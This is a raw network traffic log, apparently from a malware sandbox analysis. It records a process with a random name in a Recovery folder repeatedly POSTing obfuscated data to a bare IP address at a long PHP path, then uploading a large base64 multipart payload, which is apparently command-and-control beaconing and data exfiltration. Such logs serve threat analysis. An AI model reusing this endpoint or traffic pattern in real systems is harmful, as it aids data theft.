                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:15.832197905 CET1564OUTData Raw: 52 5d 5f 58 5e 5b 55 51 58 57 5a 57 52 5c 51 57 5b 5c 5d 42 57 57 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R]_X^[UQXWZWR\QW[\]BWWPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"%<#:V!&*>>+^$Y$_%:("1Y)88V)(642[-).\%!Z+
                                                                                          Dec 10, 2024 07:28:16.725687981 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:16.965573072 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:16 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 58 20 3a 28 04 25 0d 3c 57 2e 31 27 55 32 2e 2b 43 2b 32 39 05 27 28 1a 06 2d 31 3b 1c 3e 2d 29 58 29 2a 34 1c 3d 59 2c 0a 27 35 21 46 0c 1d 24 59 30 15 25 04 30 3e 27 5c 27 06 33 58 27 22 30 05 3e 20 20 16 23 1d 2f 5e 27 0a 20 55 3b 03 08 55 3b 35 2a 0b 3d 0c 00 11 26 28 22 57 0d 12 24 0b 32 56 25 5e 37 32 2e 1c 22 08 3b 0a 2b 43 2c 5d 24 2d 3b 59 36 03 21 5b 30 1f 06 58 20 0e 27 07 3c 05 3e 5d 32 3e 31 09 24 01 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%X :(%<W.1'U2.+C+29'(-1;>-)X)*4=Y,'5!F$Y0%0>'\'3X'"0> #/^' U;U;5*=&("W$2V%^72.";+C,]$-;Y6![0X '<>]2>1$ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          6192.168.2.849718147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:16.191601992 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2504
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:16.551209927 CET2504OUTData Raw: 52 5a 5f 5d 5b 5c 50 5c 58 57 5a 57 52 55 51 52 5b 5f 5d 48 57 52 50 5b 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: RZ_][\P\XWZWRUQR[_]HWRP[^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z&##\="%)>+Z3'$975.!Y?>8!X#"X/9.\%!Z+<
                                                                                          Dec 10, 2024 07:28:17.452816963 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:17.685051918 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:17 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          7192.168.2.849720147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:18.506297112 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:18.851480007 CET2512OUTData Raw: 57 5a 5f 5a 5e 58 55 58 58 57 5a 57 52 5c 51 56 5b 5b 5d 41 57 51 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZ_Z^XUXXWZWR\QV[[]AWQP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z'/37P65=*>7_3?43(T6&++?>*7#[-).\%!Z+
                                                                                          Dec 10, 2024 07:28:19.760482073 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:19.993072033 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:19 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          8192.168.2.849722147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:21.919303894 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          9192.168.2.849723147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:22.113157034 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:22.460975885 CET2004OUTData Raw: 57 58 5f 58 5b 5b 55 5f 58 57 5a 57 52 5c 51 54 5b 58 5d 49 57 55 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WX_X[[U_XWZWR\QT[X]IWUP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!&_4))6&=>[$8\%*#!>-\)8,V); T49.\%!Z+
                                                                                          Dec 10, 2024 07:28:23.374237061 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:23.609082937 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 5f 20 3a 2b 58 31 33 0e 54 38 1f 33 50 26 3d 0a 1d 29 0c 29 05 32 28 20 04 3a 32 05 50 3e 3d 3e 04 28 14 37 0f 29 59 33 1f 25 35 21 46 0c 1d 24 1a 24 38 3e 5d 33 13 09 5d 27 3c 2c 00 24 0c 20 01 29 20 30 53 37 30 3f 5f 24 1d 34 12 2f 04 36 1c 38 25 07 19 2a 1c 2a 53 25 12 22 57 0d 12 27 51 25 30 2a 03 20 0c 3d 0c 36 0f 05 0b 28 43 3f 05 24 00 34 00 35 3a 13 5d 24 31 20 5b 34 0e 28 12 28 15 39 04 26 13 26 53 27 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%_ :+X13T83P&=))2( :2P>=>(7)Y3%5!F$$8>]3]'<,$ ) 0S70?_$4/68%**S%"W'Q%0* =6(C?$45:]$1 [4((9&&S' ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          10192.168.2.849724147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:22.351869106 CET344OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Dec 10, 2024 07:28:22.711570978 CET2512OUTData Raw: 57 5c 5f 53 5b 5c 55 59 58 57 5a 57 52 5c 51 51 5b 58 5d 40 57 54 50 5e 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W\_S[\UYXWZWR\QQ[X]@WTP^^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"&?<[#\&P!5!Y*- 'Y4'\76>1Y?;*(5Z#;Y.9.\%!Z+
                                                                                          Dec 10, 2024 07:28:23.618660927 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:23.852926016 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:23 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          11192.168.2.849726147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:24.301578999 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:24.648294926 CET2512OUTData Raw: 57 5f 5f 5a 5b 5c 50 5e 58 57 5a 57 52 53 51 56 5b 58 5d 45 57 50 50 54 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: W__Z[\P^XWZWRSQV[X]EWPPT^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"\%(\ *%!6:)%,+$$T".1]((P*5Z72#Y:.\%!Z+<
                                                                                          Dec 10, 2024 07:28:25.550352097 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:25.786278009 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:25 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          12192.168.2.849727147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:27.016736984 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:27.377964973 CET2512OUTData Raw: 52 5c 5f 5c 5b 5b 55 5c 58 57 5a 57 52 54 51 56 5b 5a 5d 48 57 57 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R\_\[[U\XWZWRTQV[Z]HWWP_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"Z%# :Q#%>)>3'?0%*?!!Z?<V);"41 :.\%!Z+
                                                                                          Dec 10, 2024 07:28:28.277115107 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:28.512897015 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:28 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:28:28.961282969 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2004
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:29.319823027 CET2004OUTData Raw: 57 5a 5a 59 5b 5b 50 5e 58 57 5a 57 52 54 51 57 5b 5d 5d 44 57 50 50 5c 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: WZZY[[P^XWZWRTQW[]]DWPP\^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_"2Z#&5&=.3??38W5.=]<,S*;%Y728-9.\%!Z+
                                                                                          Dec 10, 2024 07:28:29.362890959 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:29.726533890 CET349INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:29 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 39 38 0d 0a 01 11 25 12 23 29 0d 5d 32 1d 20 54 38 08 27 1e 31 03 02 18 2a 1c 29 07 25 38 2b 17 2d 0c 37 56 3d 3d 2a 04 3c 3a 20 54 29 11 28 0e 27 1f 21 46 0c 1d 24 58 24 38 32 16 25 3d 20 00 24 01 0e 06 33 31 20 01 3e 33 24 53 23 33 33 5d 27 0d 24 56 2d 3e 35 0f 38 0b 2e 09 29 31 29 0b 32 02 22 57 0d 12 24 0b 32 56 22 00 22 21 21 0d 35 1f 20 53 3c 25 0d 04 33 3e 2f 5a 22 03 39 10 24 32 24 58 22 34 20 13 3f 02 22 5c 25 2e 3e 50 24 11 20 5e 2a 0e 2b 55 04 3f 57 54 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98%#)]2 T8'1*)%8+-7V==*<: T)('!F$X$82%= $31 >3$S#33]'$V->58.)1)2"W$2V""!!5 S<%3>/Z"9$2$X"4 ?"\%.>P$ ^*+U?WT0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          13192.168.2.849728147.45.47.151801296C:\Recovery\BQrPGmkzolSuiSkMAkyslxsiiFSSM.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Dec 10, 2024 07:28:29.257258892 CET320OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: application/octet-stream
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 2512
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:29.616718054 CET2512OUTData Raw: 52 5e 5a 5e 5b 5f 50 59 58 57 5a 57 52 54 51 5c 5b 5a 5d 45 57 5e 50 5f 5e 5d 41 5b 50 53 58 57 43 5c 5b 5d 55 5b 52 50 43 5e 55 51 59 52 5b 41 5a 51 5b 5f 5a 5a 51 5d 59 5c 54 5f 5f 5a 50 59 5f 57 41 59 57 52 5f 50 5d 52 59 5f 5f 56 5e 53 54 58
                                                                                          Data Ascii: R^Z^[_PYXWZWRTQ\[Z]EW^P_^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^ZP^]]]_XR_]_^P^R_QQT_B]]\X_TUCP_FRSZQ[BWTURUSXZZ]_W]_!%4_#*Q"!Z).7]0(0*45-+8 Q)+" !#\.9.\%!Z+
                                                                                          Dec 10, 2024 07:28:30.521306992 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:30.756982088 CET200INHTTP/1.1 200 OK
                                                                                          Server: nginx
                                                                                          Date: Tue, 10 Dec 2024 06:28:30 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 34 0d 0a 33 59 5c 56 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 43Y\V0
                                                                                          Dec 10, 2024 07:28:30.759257078 CET366OUTPOST /AsyncPrivategeneratorGenerator/generatorphp/Downloads/Request/videoPublicDownloadsBase/ImageApilinux.php HTTP/1.1
                                                                                          Content-Type: multipart/form-data; boundary=----nCS53NPw2nKhZqltAC7D5xETwvhPigkYiE
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
                                                                                          Host: 147.45.47.151
                                                                                          Content-Length: 115942
                                                                                          Expect: 100-continue
                                                                                          Dec 10, 2024 07:28:31.149560928 CET14832OUTData Raw: 2d 2d 2d 2d 2d 2d 6e 43 53 35 33 4e 50 77 32 6e 4b 68 5a 71 6c 74 41 43 37 44 35 78 45 54 77 76 68 50 69 67 6b 59 69 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22
                                                                                          Data Ascii: ------nCS53NPw2nKhZqltAC7D5xETwvhPigkYiEContent-Disposition: form-data; name="0"Content-Type: text/plainR]Z_^UPZXWZWRTQR[Q]FWSPU^]A[PSXWC\[]U[RPC^UQYR[AZQ[_ZZQ]Y\T__ZPY_WAYWR_P]RY__V^STXPQW@XCWTTV[S]T[_XW]V__[TYW_U[TUD_]YZ][Z]F__T[_^U^
                                                                                          Dec 10, 2024 07:28:31.162069082 CET25INHTTP/1.1 100 Continue
                                                                                          Dec 10, 2024 07:28:31.269294977 CET4944OUTData Raw: 79 56 67 78 4f 44 4d 69 38 74 4b 72 57 70 70 55 61 74 6d 45 57 71 57 68 68 47 50 51 59 48 46 42 56 31 72 4e 72 70 2b 4e 63 61 44 46 43 38 56 6c 32 4a 50 42 64 37 4d 43 45 57 43 6a 4d 4a 67 37 32 4c 65 45 56 44 4e 46 6a 7a 77 4b 72 65 36 64 6e 46
                                                                                          Data Ascii: yVgxODMi8tKrWppUatmEWqWhhGPQYHFBV1rNrp+NcaDFC8Vl2JPBd7MCEWCjMJg72LeEVDNFjzwKre6dnFe1wv4GBjaQUQ9hX2My6TCkBExarfEPbv7V1UQvBIMLhMsMbXO2DzQtmmYATFXRaEVLrbWW/3lsHhTfzL+fF3wdCVvSdFlSa8n4mmhTK6EGicQDkJTWHfwJtJmCNWoTSR2s3hdDKPXAdVLQq+J5jgzsyaC704l9BlI
                                                                                          Dec 10, 2024 07:28:31.269335032 CET9888OUTData Raw: 52 55 45 4e 4c 72 38 6e 6a 32 6a 35 2f 6d 36 43 4a 4a 7a 4e 58 44 68 61 52 6c 76 46 38 6a 5a 32 75 73 56 46 56 72 44 38 70 6e 68 70 43 58 2f 4b 7a 6b 56 66 62 48 31 35 57 57 57 4e 73 5a 50 32 6e 52 66 68 2b 6a 55 39 44 56 33 6e 56 34 4a 64 44 54
                                                                                          Data Ascii: RUENLr8nj2j5/m6CJJzNXDhaRlvF8jZ2usVFVrD8pnhpCX/KzkVfbH15WWWNsZP2nRfh+jU9DV3nV4JdDTghmhfSniYocYRFtNLwlvVGdBQYvMvL96zyj9GxcLJkU+9PUhIetogyg+ldv/JB5HvzbdN7oYqhKvYlt5WWY1k7leDQ/MsuYi+4DWviFRpyYLY2i8AKxnxk4raIzK+kX1XVD6/LVGfZ7nByZzrquep1JnG5x9fc6s3
                                                                                          Dec 10, 2024 07:28:31.269551992 CET4944OUTData Raw: 61 61 6c 30 51 36 73 62 41 6c 48 5a 49 6f 57 72 69 36 4d 78 69 38 72 6e 53 44 63 6d 70 67 72 79 2b 69 70 6d 55 59 56 6a 72 6f 43 4f 4a 77 62 57 6e 77 53 39 6d 76 61 4a 65 6c 45 46 4d 34 2f 55 49 6e 45 73 51 4f 4f 4f 44 76 38 69 4c 46 49 44 30 4b
                                                                                          Data Ascii: aal0Q6sbAlHZIoWri6Mxi8rnSDcmpgry+ipmUYVjroCOJwbWnwS9mvaJelEFM4/UInEsQOOODv8iLFID0KAX98QobtLq4l42cZBupbUnehIpqxdYjlYAcHYcTv5rZIY84ihePnUA52ofDb7ombGJWV1xouYyA+gxp/VV0hvkBuefnUVMkCwk79ZhTmJOohsGgR45+tybhQLrmXqEDXDeSPrcg+KplKelc+xpvI3e1opXK+j9Dpv
                                                                                          Dec 10, 2024 07:28:31.269608974 CET4944OUTData Raw: 44 38 67 34 4a 71 66 78 49 46 53 74 78 6f 6d 32 42 42 67 34 36 54 36 4e 42 39 6d 65 69 46 6d 53 68 62 4e 32 39 53 68 55 42 64 49 54 54 6d 51 6c 2f 74 75 63 51 54 6f 56 36 59 2b 6f 62 70 46 2f 75 64 36 45 63 7a 41 6b 34 6e 68 55 6a 54 77 74 6b 51
                                                                                          Data Ascii: D8g4JqfxIFStxom2BBg46T6NB9meiFmShbN29ShUBdITTmQl/tucQToV6Y+obpF/ud6EczAk4nhUjTwtkQEyOEkAw5BmAmw0GuRCmj7yPx0l5NNfvCTLhghomAHwCBgyDYR2xd9wyqTsU3fHCAuIf5ErUm5r72XYynx/rzQl9P2q+l1tcu7ABKM47XzDA1DyDO3udb2cb4SWuK7qBNHJALVdgYJBqWYXGw/nMBnsBhzNE2HwiRg
                                                                                          Dec 10, 2024 07:28:31.269633055 CET4944OUTData Raw: 5a 6d 69 77 34 66 2b 49 4c 6c 37 53 6a 39 35 47 50 41 37 37 59 78 33 31 6e 62 4a 4c 6a 69 41 52 50 6a 47 53 4d 31 45 46 4d 7a 78 6a 46 41 39 51 31 4c 49 77 34 75 63 43 72 2b 49 32 7a 35 75 2f 63 37 6b 76 65 77 39 70 32 6c 45 72 46 35 61 76 52 54
                                                                                          Data Ascii: Zmiw4f+ILl7Sj95GPA77Yx31nbJLjiARPjGSM1EFMzxjFA9Q1LIw4ucCr+I2z5u/c7kvew9p2lErF5avRTuZZIeckcBoGxuVV2v3fBiuxncJzqzJBF77WixtNkaiJHWKMayRDRUwf83KoyFUev+W+tV1m958nncsv2IKuOJcvnYLsXW1d37km/Govj0SELq3laem80391mTc4uzrC8s5vSkj/sYwpTcsYSoX6HeSZjfzEzueWAy
                                                                                          Dec 10, 2024 07:28:31.388820887 CET4944OUTData Raw: 2b 54 69 43 53 43 41 74 7a 35 4f 43 71 48 34 6e 77 43 39 4f 59 30 6b 4b 4a 46 62 4a 48 44 33 70 57 48 66 67 65 4f 53 32 36 54 2b 46 38 50 2f 64 31 5a 79 30 52 4b 6d 4f 79 66 2b 70 66 36 2f 54 2f 32 49 50 57 72 72 6a 66 4d 6f 2f 65 55 46 72 6b 4c
                                                                                          Data Ascii: +TiCSCAtz5OCqH4nwC9OY0kKJFbJHD3pWHfgeOS26T+F8P/d1Zy0RKmOyf+pf6/T/2IPWrrjfMo/eUFrkL4a6Hjj3BOAIC/z47Tyfwd7Ybt4ID0uqpsCRlZoJV0PefT7ZE400szuCvQWyPb/d7GyoxFAiwNFx7tDkmIecqpF5MpJDUxOnxRN9JACD16QAYvXMQglggUoHDu5Xl9No4br0YG6z8PU/ASAtCR9dUcKNXG4A6g87cw
